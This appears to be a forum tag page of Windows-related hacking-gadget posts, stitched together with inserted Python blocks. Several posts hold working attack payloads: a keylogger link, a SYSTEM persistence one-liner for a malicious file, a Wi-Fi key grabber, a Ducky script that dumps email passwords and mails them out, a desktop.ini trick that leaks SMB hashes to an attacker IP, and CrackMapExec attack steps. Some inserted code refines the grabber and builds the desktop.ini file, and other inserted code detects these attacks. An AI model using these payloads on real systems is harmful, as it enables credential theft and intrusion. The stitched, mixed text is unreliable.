Showing results for tags 'windows'.

  1. At first: sorry for my bad English, I'm German and only 14 years old. I upload an .exe file from my computer to my FTP server with FTP.exe (cmd). Before I did that it was working just fine. But after I downloaded it, it comes up with the following error: "The file is not compatible with your computer." Before that, it came up with another error, something like "not compatible with a 64-bit system". I accidentally asked the question on StackOverflow 2 hours ago, and some people answered that I have to activate binary mode. When I do that with the "binary" command, I get an answer that the activation was successful, but it isn't working anyway. The .exe looks identical after download, but instead of having the old icon it shows the standard .exe icon. I do not want to use another FTP program like FileZilla or ncftp (I tried it with FileZilla, it isn't working either, so I don't think that FTP.exe is the problem here). The commands I used + output (maybe the translation isn't correct, but I think you know what the output meant):
     C:\WINDOWS\system32>ftp myftpserver.com
     Connection to icarus.bplaced.net established.
     220 Welcome to myftpserver.com, FTP server standing by ...
     504 Unknown command
     User (myftpserver.com:(none)): user
     331 Hello user, your FTP account password is required:
     password: password
     230-Login successful, your current directory is /
     230 34349 Kbytes used (3%) - authorized: 1048576 Kb
     ftp> binary
     200 TYPE is now 8-bit binary
     ftp> get example.exe
     200 PORT command successful
     150-Connecting to port 61051
     150 347.5 kbytes to download
     226-File successfully transferred
     226 1.648 seconds (measured here), 210.83 Kbytes per second
     FTP: 355794 bytes received in 1.91 seconds 186.38KB/s
     ftp>
     Thanks and greetings, c0ntriX
     Edit: I'm on a 64-bit system.
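The failure mode behind the "activate binary mode" advice is that an ASCII-mode (TYPE A) transfer rewrites line endings, which inserts bytes into a PE file and shifts every offset after the first 0x0A byte, including the one in the standard DOS stub. The check a practitioner wants after any transfer is a hash comparison plus a sanity check of the PE header. The following is an added example, not code from the post or from ftp.exe; the MZ/PE image it builds is a constructed stub, and the ASCII-mode model (every LF becomes CRLF) is deliberately simplified:

```python
import hashlib
import struct

# Constructed stand-in for a real .exe: a DOS header whose e_lfanew points past
# the usual "This program cannot be run in DOS mode." stub to a PE signature.
DOS_STUB = b"This program cannot be run in DOS mode.\r\r\n$"


def build_minimal_pe() -> bytes:
    """Build a tiny MZ/PE image (constructed test data, not a runnable program)."""
    e_lfanew = 0x40 + len(DOS_STUB)
    dos_header = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    assert len(dos_header) == 0x40
    # Any real image is full of 0x0A bytes in code and data; bytes(range(256)) supplies some.
    body = b"PE\x00\x00" + b"\x00" * 20 + bytes(range(256))
    return dos_header + DOS_STUB + body


def ascii_mode_transfer(data: bytes) -> bytes:
    """Simplified model of an FTP TYPE A (ASCII) transfer to a Windows client:
    every LF byte is rewritten as CRLF. Real clients differ in detail, but any
    line-ending translation inserts bytes and shifts every later offset."""
    return data.replace(b"\n", b"\r\n")


def check_pe(data: bytes) -> bool:
    """True if data starts with 'MZ' and e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def verify_transfer(original: bytes, received: bytes) -> dict:
    """Compare a file before and after transfer, the same comparison you would do
    with `certutil -hashfile example.exe SHA256` on Windows and sha256sum on the server."""
    return {
        "size_match": len(original) == len(received),
        "sha256_match": hashlib.sha256(original).digest() == hashlib.sha256(received).digest(),
        "pe_ok": check_pe(received),
    }


if __name__ == "__main__":
    exe = build_minimal_pe()
    print("binary mode:", verify_transfer(exe, exe))
    print("ascii mode: ", verify_transfer(exe, ascii_mode_transfer(exe)))
```

The hash comparison is the decisive check: if the SHA-256 on the client matches the one on the server, the transfer is not the problem; if the sizes differ, something between the two ends rewrote the bytes. A PE whose resource section no longer parses is also consistent with Explorer showing the generic .exe icon instead of the embedded one.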
  2. Hi there, I just finished the first version of my BB keylogger. It basically launches a PowerShell which keylogs to the loot folder of the BB. Features: fast launching (thanks to USB Exfil for the one-line launcher); leaves no traces when cleanup is enabled. (Insert feature?) Link: https://github.com/Vinc0682/bashbunny-payloads/tree/master/payloads/library/phishing/WinKeylogger VincBreaker PS: I will create a pull request upon positive feedback and improve the payload in the other case.
  3. How does the Bash Bunny gain execution access in mass storage attack mode (in Windows)? Will it always work when Windows autorun is disabled? I would love to get a detailed explanation of how it works.
  5. Localized SMB Powershell delivery. For when USB and Web methods are disabled or too noisy. https://github.com/hak5/bashbunny-payloads/pull/172
  6. Violation of CoC
  7. Hi, when I am trying to install the tools_installer payload, the Bash Bunny's green LED is plain solid and Windows 10 can't seem to be able to install the driver for ATTACKMODE SERIAL, I guess? Did anyone manage to solve this? I can connect to it via SSH (serial) when in arming mode, so I am not sure what is going on. I did try the automatic driver search function and googled around a bit for a generic driver, but I am still a bit stuck. Can anyone help? / Albert
  8. Violation of CoC
  9. Hi, I just received my Bash Bunny a few days ago and I've been tinkering around with it. It seems, to me, to be quite buggy: - Windows does not recognise the RNDIS interface at all. Not on Windows 7, not on Windows 10. - On macOS, the ethernet interface *sometimes* works, sometimes it doesn't. When it does work, it is *sometimes* possible to connect to the Bunny; quite often, SSH doesn't start up even though FTP and other services are running. This even after a few minutes of waiting. - The serial interface often conflicts with having network & storage together, resulting in nothing happening or giving only access to storage. (I did this by adding "SERIAL" to the standard payloads already on the Bunny.) - Using the manuals found online for network sharing (macOS Internet Sharing through 172.16.64.64), I cannot access the internet from the Bunny, so I cannot update it. On Windows, that's entirely out of the question as Windows does not even recognise the RNDIS network device. Windows gives the following message on the RNDIS driver: The drivers for this device are not installed. (Code 28) There are no compatible drivers for this device. To find a driver for this device, click Update Driver.
  10. Hey, I just found a method to start your malicious msf/or whatever payload as the SYSTEM user from boot. This little shell line (the shell needs to be run as administrator):
      schtasks /create /tn "Windows Help Service" /tr C:\maliciousfile.exe /sc onstart /ru SYSTEM /F
      creates a task named "Windows Help Service" which runs C:\maliciousfile.exe every startup as the SYSTEM user. Keep in mind that when using this as a payload you may need to escape the /, \ and ". I'm currently working on a C++ version of PSExec (Source) to get rid of the .NET Framework. Feel free to post your payload using the simple one-liner which starts your malicious file as SYSTEM every boot :)
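The defensive counterpart to the one-liner above is to enumerate the tasks a host already has and pull out the ones that run as SYSTEM at boot from an unusual location. This is an added example, not part of the post: it parses the CSV that `schtasks /query /fo CSV /v` prints, using the real column names "TaskName", "Task To Run", "Schedule Type" and "Run As User", but the sample rows are constructed, and the hostname WS01, the user bob and the task list are invented for illustration.

```python
import csv
import io

# Constructed excerpt of `schtasks /query /fo CSV /v` output. Only the columns
# this check reads are kept (the real output has many more), and the rows are
# invented: the second one is what the post's command would register.
SAMPLE_CSV = r'''"HostName","TaskName","Task To Run","Schedule Type","Run As User","Author"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -k -g -$","At system start up","SYSTEM","Microsoft Corporation"
"WS01","\Windows Help Service","C:\maliciousfile.exe","At system start up","SYSTEM","WS01\bob"
"WS01","\Adobe Acrobat Update Task","C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe","Daily","INTERACTIVE","Adobe Systems Incorporated"
'''

SYSTEM_ACCOUNTS = {"SYSTEM", "NT AUTHORITY\\SYSTEM", "LOCALSYSTEM"}
TRUSTED_PREFIXES = ("%windir%", "%systemroot%", "c:\\windows\\")


def task_binary(task_to_run: str) -> str:
    """Strip arguments from the 'Task To Run' column; the command may be quoted or bare."""
    cmd = task_to_run.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split(" ", 1)[0]


def is_suspicious(row: dict) -> bool:
    """A boot-time task running as SYSTEM whose binary lives outside the Windows
    directory, or that sits at the task root instead of under a vendor folder."""
    runs_as_system = row["Run As User"].strip().upper() in SYSTEM_ACCOUNTS
    at_boot = row["Schedule Type"].strip().lower().startswith("at system start")
    binary = task_binary(row["Task To Run"]).lower()
    trusted_location = binary.startswith(TRUSTED_PREFIXES)
    at_root = row["TaskName"].count("\\") == 1  # "\Name" rather than "\Microsoft\Windows\..."
    return runs_as_system and at_boot and (not trusted_location or at_root)


def find_suspicious_tasks(csv_text: str) -> list:
    """Task names worth a closer look, in the order schtasks listed them."""
    rows = csv.DictReader(io.StringIO(csv_text))
    return [
        row["TaskName"]
        for row in rows
        if row["TaskName"] != "TaskName" and is_suspicious(row)  # skip any repeated header rows
    ]


if __name__ == "__main__":
    for name in find_suspicious_tasks(SAMPLE_CSV):
        print("suspicious:", name)
```

On a real host, run `schtasks /query /fo CSV /v > tasks.csv` and feed the file to `find_suspicious_tasks`. The task definition itself is the XML file under C:\Windows\System32\Tasks\<task name>, and with object-access auditing for scheduled tasks enabled, creation is logged as Security event 4698, which is the cheap place to catch the one-liner at the moment it runs.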
  11. CrackMapExec is a fantastic tool developed by Byt3bl33de3r and can be found here: https://github.com/byt3bl33d3r/CrackMapExec As stated in the repo's README, it's powered by Impacket and takes cues and inspiration from several other tools targeting SMB, WMI, and Windows in general. I recommend reading up on it if you are unfamiliar. For now, it's worth mentioning that CrackMapExec (CME) is also a Python library that can be installed with pip and used like a standard tool, i.e. you can type "crackmapexec" and use it without needing a Python script to act as a vehicle. I installed it on the Bunny and have used it for some network-based attacks using RNDIS_ETHERNET mode. If you'd like to do the same, I encourage you to install pip. Connect to the Bunny via SSH and use curl with the "insecure" and output file options, like so:
      cd /pentest
      curl -k -O https://bootstrap.pypa.io/get-pip.py
      Now check your Bunny's current system date and time. If it's not current then you need to update it or Python and SSL will throw a fit because the date/time is wrong. Then use Python to run the script:
      python get-pip.py
      That may take some time to complete, but pip will open up a lot of possibilities and assist with Python tools and dependencies. Once that's done, you'll need to install packages required for supporting OpenSSL/PyOpenSSL. You'll need to have shared your internet connection with the Bunny for this to work.
      apt-get install build-essential libssl-dev libffi-dev python-dev
      Once those packages have been installed successfully, you should now be able to successfully use pip to install CME. If something goes wrong with this next step, it's almost certainly related to the cryptography library and a missing dependency. Read the error carefully and Google it. You can be certain there will be several GitHub and StackOverflow hits at the top. Run pip:
      pip install crackmapexec
      Once that is done, you can test everything by just running "crackmapexec" in your terminal and you should see CME spit out its help text and version information. You're now ready to include CME commands in your Bunny payloads. CME is a network attack tool, so you can use it against locked PCs. A very basic example of this is:
      crackmapexec $TARGET_IP
      That command tells CME to connect to the target's IP address via SMB. If that much can be done, CME will return a hostname and the target's operating system build. This is a fast "attack" and can be used to, let's say, fingerprint a machine quickly to prove you had access and collect some information. You can go a step further with this:
      crackmapexec $TARGET_IP -u "" -p ""
      That tells CME to try a null session with SMB. If the target disallows null sessions nothing bad happens. You still get the basic OS details. If the target allows for a null session to be initiated then you can check for success and then potentially proceed with something like running CME again with the addition of "--shares" to enumerate network shares and gather additional information. If you happen to have a password hash or credentials from an earlier attack (perhaps phishing or passed to you from a teammate), those creds can be used with CME and any CME-based payload can be easily edited to include the credentials for a much wider variety of attacks.
  12. Ok, so here's a payload that can grab any of the Wi-Fi info for the network the computer is connected to. To find the info once the payload is finished, you need to search for "Log.txt". Only works on Windows.
      DELAY 1000
      GUI r
      DELAY 500
      STRING cmd
      ENTER
      DELAY 1000
      REM The @ will be typed as " in the Command prompt
      STRING cd @%USERPROFILE%\Desktop@ & for /f @tokens=2 delims=: @ %A in ('netsh wlan show interface ^| findstr @SSID@ ^| findstr /v @BSSID@') do set A=%A
      ENTER
      DELAY 100
      STRING netsh wlan show profiles %A% key=clear | findstr /c:@Network type@ /c:@Authentication@ /c:@Key Content@ | findstr /v @broadcast@ | findstr /v @Radio@>>A.txt
      ENTER
      DELAY 100
      STRING for /f @tokens=3 delims=: @ %A in ('findstr @Network type@ A.txt') do set B=%A
      ENTER
      DELAY 100
      STRING for /f @tokens=2 delims=: @ %A in ('findstr @Authentication@ A.txt') do set C=%A
      ENTER
      DELAY 100
      STRING for /f @tokens=3 delims=: @ %A in ('findstr @Key Content@ A.txt') do set D=%A
      ENTER
      DELAY 100
      STRING del A.txt
      ENTER
      DELAY 100
      STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt
      ENTER
      Feel free to ask any questions, and if there are any errors that need to be fixed in this, let me know.
  13. Hello guys. I'm new in this community, so nice to meet you! I'm very happy to finally write on this forum, which I've been reading for a while by now. I finally managed to build my Twin Ducky able to steal targeted files, following the latest episodes of DK (2112-2113-2114). So of course I started enjoying playing with the parameters of e.cmd, and I was able to manage (unfortunately I have to admit, without any coding skills, don't get mad at me :P) to teach the Rubber Ducky not to steal just PDFs in the Documents folder but also to look for any pdf and doc file in all the folders belonging to %USERPROFILE%. Now, I wanted to go even further by making the process even faster. I thought the duration of the exfiltration process depends on the size of the pdf/doc/whatever document which we are trying to steal, and MAYBE we already know that the document we are looking for doesn't exceed a size of, let's say, 10-15 MB. Wouldn't it be cool to write also a line to exclude those files? Wouldn't it be even faster? What do you think about this? Hope not to have written something stupid :S I'm neither a native English speaker nor experienced in pentesting like you guys, so in that case forgive me. Let me know :) Have a nice day!
  14. Hey all, I made a first pass at a rogue-USB-device defense called Beamgun. It's a tiny Windows-only service that listens for keyboards, network adapters, and USB storage devices and takes some user-defined action (like locking the workstation or disabling the network adapter). Code's here: https://github.com/JLospinoso/beamgun Two blog posts on how it works (but it's pretty self-explanatory): https://jlospinoso.github.io/infosec/usb rubber ducky/c%23/clr/wpf/.net/security/2016/11/15/usb-rubber-ducky-defeat.html https://jlospinoso.github.io/infosec/usb rubber ducky/lan turtle/c%23/clr/wpf/.net/security/2016/11/30/beamgun-update-poison-tap.html Y'all are an incredibly innovative group and I'd love it if you absolutely attack the crap out of it. Game on!! Josh
  16. This is my very first Rubber Ducky script; it utilises things I learnt from the Hak5 crew and others. It also uses a program (MailPassView) from one of my favourite websites for tools, Nirsoft. I hope you find it useful..... I have :)
      REM Author: CTSNWW
      REM Date: 11/10/2016
      REM Let's back up our email account settings and passwords, shall we?
      REM Note: This is my first RubberDucky attempt!
      REM The program MailPassView is available from NIRSOFT.NET, where you will also find some other brilliant programs
      REM
      REM See https://www.google.com/settings/security/lesssecureapps - you need to do this to send to Gmail from the command prompt
      REM
      REM Some of the delays are large because older computers will struggle to keep up
      REM
      DELAY 3000
      GUI d
      CONTROL ESCAPE
      DELAY 1000
      STRING cmd
      DELAY 1000
      CTRL SHIFT ENTER
      DELAY 1000
      ALT y
      ENTER
      DELAY 300
      STRING CD %TEMP%
      ENTER
      REM -------------Just in case we have run an incomplete version of this script before - clean up
      STRING del email.txt
      ENTER
      DELAY 2000
      STRING del mpv.exe
      ENTER
      REM -------------Download MailPassView
      STRING powershell (new-object System.Net.WebClient).DownloadFile('PUT YOUR FULL URL PATH HERE/mailpv.exe','%TEMP%\mpv.exe')
      ENTER
      STRING mpv.exe
      ENTER
      DELAY 5000
      CTRL A
      DELAY 500
      CTRL S
      DELAY 2000
      STRING %TEMP%\email.txt
      ENTER
      DELAY 2000
      ALT f
      STRING x
      DELAY 300
      REM -------------email log via gmail
      STRING powershell
      ENTER
      DELAY 300
      STRING $SMTPServer = 'smtp.gmail.com'
      ENTER
      STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
      ENTER
      STRING $SMTPInfo.EnableSsl = $true
      ENTER
      STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('ACCOUNTNAME@gmail.com', 'ACCOUNT PASSWORD');
      ENTER
      STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
      ENTER
      STRING $ReportEmail.From = 'FROM EMAIL ADDRESS'
      ENTER
      STRING $ReportEmail.To.Add('ACCOUNTNAME@gmail.com')
      ENTER
      STRING $ReportEmail.Subject = 'Duck Report'
      ENTER
      STRING $ReportEmail.Body = 'Attached is your duck report.'
      ENTER
      STRING $ReportEmail.Attachments.Add('email.txt')
      ENTER
      STRING $SMTPInfo.Send($ReportEmail)
      ENTER
      REM -------------Clean Up the mess
      DELAY 8000
      STRING del email.txt
      ENTER
      STRING del mpv.exe
      ENTER
      DELAY 300
      STRING exit
      ENTER
      GUI d
  17. I am running VMware Fusion on a Mac with a Windows 7 guest. My goal is to run the Invoke-Mimikatz payload for credential pilfering, which involves sending WIN-R (GUI r) to the Windows OS. However, because Windows 7 is running as a guest VM, the Windows OS doesn't actually see the Ducky connect as a USB keyboard. The Ducky connects to the host OS (Mac OS X) instead. When the script sends a 'GUI r', this doesn't seem to get passed to the guest VM (Windows), even if the focus is on the VM at the time. However, if I write a basic script that simply sends a 'STRING Hello World' and 'ENTER', then I see these characters appear, if I first open Notepad to give it something to type into. Has anyone tried something like this before, or does anyone have an idea how to go about addressing this?
  18. Hey there, I'm quite new to using the Rubber Ducky and just wanted to ask a general question relating to a command that detects the connected Wi-Fi on a Windows machine. For example, the code below:
      REM Windows Wifi Grabber
      DELAY 2000
      GUI r
      DELAY 200
      STRING cmd
      ENTER
      DELAY 200
      STRING netsh wlan show profile name=RANDOMESSID key=clear
      ENTER
      simply opens up cmd and types that command in. My question is if there is a cmd command that can replace "RANDOMESSID" with a command that automatically replaces that section with the connected Wi-Fi ESSID on the machine. Thanks!
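Post 12 above answers post 18's question in batch (the `for /f` over `netsh wlan show interface` filtered with `findstr SSID` and `findstr /v BSSID`), but the fragile part of both scripts is the text parsing: splitting on ":" and spaces with `tokens=3` truncates any key that contains a space, and `findstr SSID` also matches the BSSID line. The following is an added example, not code from either post, that does the same two steps as a parser: read the connected SSID from `netsh wlan show interfaces`, then pull the profile fields out of `netsh wlan show profile name="..." key=clear`. The sample outputs are constructed in the layout netsh uses, not captured from a real machine, and the SSID, cipher list and key are invented.

```python
import re
import subprocess
import sys
from typing import Optional

# Constructed sample output (not captured from a real machine) in the layout
# `netsh wlan show interfaces` and `netsh wlan show profile name="..." key=clear` use.
SAMPLE_INTERFACES = """
There is 1 interface on the system:

    Name                   : Wi-Fi
    State                  : connected
    SSID                   : Coffee Shop Guest
    BSSID                  : 00:11:22:33:44:55
    Network type           : Infrastructure
"""

SAMPLE_PROFILE = """
Profile Coffee Shop Guest on interface Wi-Fi:
=======================================================================

Connectivity settings
---------------------
    Number of SSIDs        : 1
    SSID name              : "Coffee Shop Guest"
    Network type           : Infrastructure
    Radio type             : [ Any Radio Type ]

Security settings
-----------------
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Authentication         : WPA2-Personal
    Cipher                 : GCMP
    Security key           : Present
    Key Content            : correct horse battery
"""

FIELD_RE = r"^\s*{}\s*:\s*(.*?)\s*$"


def field(text: str, name: str) -> Optional[str]:
    """First value of a 'Name : value' line. Anchoring the name at line start keeps
    'SSID' from matching the 'BSSID' line, which is why the batch version needs findstr /v."""
    m = re.search(FIELD_RE.format(re.escape(name)), text, re.MULTILINE)
    return m.group(1) if m else None


def connected_ssid(interfaces_text: str) -> Optional[str]:
    """SSID of the interface only when it reports State : connected."""
    if field(interfaces_text, "State") != "connected":
        return None
    return field(interfaces_text, "SSID")


def parse_profile(profile_text: str) -> dict:
    """The three values the batch payload writes to Log.txt; the key is taken as the
    whole remainder of the line, so keys containing spaces survive."""
    return {
        "network_type": field(profile_text, "Network type"),
        "authentication": field(profile_text, "Authentication"),
        "key": field(profile_text, "Key Content"),
    }


def grab_current_wifi() -> Optional[dict]:
    """Run the real netsh commands (Windows only); the list form of subprocess quotes
    the SSID for us, which the cmd one-liner has to do by hand with name="...". """
    if sys.platform != "win32":
        return None
    ifaces = subprocess.run(["netsh", "wlan", "show", "interfaces"],
                            capture_output=True, text=True).stdout
    ssid = connected_ssid(ifaces)
    if ssid is None:
        return None
    prof = subprocess.run(["netsh", "wlan", "show", "profile", f"name={ssid}", "key=clear"],
                          capture_output=True, text=True).stdout
    return {"ssid": ssid, **parse_profile(prof)}


if __name__ == "__main__":
    print(connected_ssid(SAMPLE_INTERFACES), parse_profile(SAMPLE_PROFILE))
    print(grab_current_wifi())
```

For the cmd-only version in post 18, the SSID needs to be quoted when it is passed to `name=` because SSIDs may contain spaces, and `key=clear` only reveals the key for profiles the running user is allowed to read.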
  19. Hi, I notice that when I plug the LAN Turtle into a Windows 7 PC it is recognized and a USB 10/100 Ethernet card gets installed, but in Windows 10 I always get nothing installed. So I tried to install the Realtek drivers and it works, but how do I use it if it doesn't install automatically in Windows?
  20. Hey, a friend of mine bought an older computer from his employer that is running Vista Home Premium, but his employer has forgotten the administrator password and has no password recovery disk. So my friend hired me to break into it. I'm having problems though. I've tried using Ophcrack on a live disk, but for some reason it can't find the password. Anyone have any ideas?
  21. When I am trying to program my Rubber Ducky I get this message: "There was an error flashing, make sure your Ducky is in DFU mode." Can someone make a video of this? Also a video on setting up a Rubber Ducky. When I plug my USB into my computer I do not see anything but a file saying "Hello World" in .txt. By the way, this is my first time in this forum. Thank you, to whomever can help me.
  22. After watching the recent episode of Hak5 (2102) on YouTube, I was wondering if this SMB hash grab method can be done without the Duck and with a normal USB stick. The answer is YES. Bytewolf @kingbytewolf
      -= HowTo do it =-
      Grab any USB stick you have lying around.
      Create a directory.
      Set the System attribute of this directory with: attrib +s <dirname>
      Create a file called desktop.ini in this directory with the following content:
        [.ShellClassInfo]
        IconResource=\\<YourIP>\tmp\demo.ico
        IconFile=%SystemRoot%\system32\shell32.dll
        IconIndex=-235
      Save the desktop.ini as a Unicode or UTF-8 file.
      Set the attributes archive, hidden and system with: attrib +a +h +s desktop.ini
      Preparation -> Done
      Put some RFCs in the directory. Fire up the smbserver and give the stick to your colleague that really needs these RFCs. >:-D When he navigates to the drive you should have the hash delivered to your doorstep without any windows popping up.
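The trick works because Explorer resolves the icon path in desktop.ini the moment the folder is rendered, and a UNC path makes it open an SMB connection and authenticate, so no click and no popup is needed. Both sides of that are easy to script: building the file exactly as the post describes, and scanning a mounted stick for desktop.ini files whose IconResource or IconFile points at a UNC path. The following is an added example, not code from the post; the address 10.0.0.5 and the folder name RFCs are placeholders, and the attrib steps (which are what hide the file and make Explorer honour it) are not reproduced here.

```python
import os
import re
import tempfile

# Matches an IconResource= or IconFile= line whose value is a UNC path (\\host\share\...).
UNC_ICON_RE = re.compile(
    r"^\s*(IconResource|IconFile)\s*=\s*(\\\\[^\\\s]+\\[^\r\n]*)",
    re.IGNORECASE | re.MULTILINE,
)


def make_desktop_ini(unc_icon: str) -> bytes:
    """The desktop.ini from the post, written as UTF-16 LE with a BOM (what Notepad
    calls 'Unicode'). attrib +s on the folder and +a +h +s on the file are still needed."""
    body = (
        "[.ShellClassInfo]\r\n"
        f"IconResource={unc_icon}\r\n"
        "IconFile=%SystemRoot%\\system32\\shell32.dll\r\n"
        "IconIndex=-235\r\n"
    )
    return b"\xff\xfe" + body.encode("utf-16-le")


def decode_ini(raw: bytes) -> str:
    """Decode by BOM, then UTF-8, with cp1252 as a stand-in for the system ANSI code page."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le")
    if raw.startswith(b"\xef\xbb\xbf"):
        return raw[3:].decode("utf-8")
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return raw.decode("cp1252", errors="replace")


def find_unc_icon_refs(text: str) -> list:
    """(key, UNC path) for every icon entry that would make Explorer reach out over SMB."""
    return [(key, value.strip()) for key, value in UNC_ICON_RE.findall(text)]


def scan_tree(root: str) -> list:
    """Walk a mounted drive (or any directory) and report desktop.ini files with UNC icon paths."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() != "desktop.ini":
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                for key, target in find_unc_icon_refs(decode_ini(fh.read())):
                    hits.append((path, key, target))
    return hits


def demo() -> list:
    """Lay out the stick in a temporary directory and scan it; 10.0.0.5 is a placeholder."""
    with tempfile.TemporaryDirectory() as stick:
        folder = os.path.join(stick, "RFCs")
        os.mkdir(folder)
        with open(os.path.join(folder, "desktop.ini"), "wb") as fh:
            fh.write(make_desktop_ini(r"\\10.0.0.5\tmp\demo.ico"))
        return scan_tree(stick)


if __name__ == "__main__":
    for path, key, target in demo():
        print(f"{path}: {key} -> {target}")
```

The scanner is the check to run on removable media before it is opened in Explorer; the network-side control is the usual one for this whole class of tricks, blocking outbound SMB (TCP 445) at the perimeter so the authentication attempt never reaches a listener the attacker controls.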
  23. Please, admins, I am not sure which category to post this under, that's why I am doing it here. I am sorry if this violates your rules; in case it does, please help me move it to the appropriate section. I hope I don't get a query for this though. I just need help with a script that can do all that the topic says. I am testing a voting site, and I've been able to deduce that I can vote multiple times making use of "Advanced Cookie Manager to clear the cookies sent from the server", "Random Agent Spoofer to randomize the user agent on every request made", "Hide My IP to also randomise my IP after each vote". Note: they are all browser add-ons, which also means I have to reload the page every time myself and click on a new IP each time. The only automated one is the Random Agent Spoofer, and I also have to click by myself. I don't want to sound lazy or anything, but please, anyone who has an idea of how I can get an automated script that does all 3 (IP spoofing, user agent changing, and cookie deleting). Any modern programming language would do the trick, I guess, but if you know of steps I can take to achieve this by writing my own custom script, your ideas are also welcome. I need it ASAP. Thanks in advance for your answers.